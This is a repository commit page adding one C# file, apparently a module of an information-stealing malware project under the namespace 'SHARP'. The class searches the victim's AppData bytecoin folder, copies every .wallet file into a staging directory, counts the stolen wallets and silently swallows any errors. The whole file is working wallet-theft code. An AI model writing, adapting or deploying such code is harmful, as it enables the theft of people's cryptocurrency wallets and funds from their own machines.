initial commit
This commit is contained in:
+25
@@ -0,0 +1,25 @@
|
||||
using System.IO;
|
||||
|
||||
namespace SHARP
|
||||
{
|
||||
internal class Bytecoin
|
||||
{
|
||||
public static void BCNcoinStr(string directorypath)
|
||||
{
|
||||
try
|
||||
{
|
||||
foreach (FileInfo file in new DirectoryInfo(Help.AppData + "\\bytecoin").GetFiles())
|
||||
{
|
||||
Directory.CreateDirectory(directorypath + "\\Wallets\\Bytecoin\\");
|
||||
if (file.Extension.Equals(".wallet"))
|
||||
file.CopyTo($"{directorypath}\\Bytecoin\\{file.Name}");
|
||||
}
|
||||
++Counting.bytecoin;
|
||||
++Counting.Wallets;
|
||||
}
|
||||
catch
|
||||
{
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user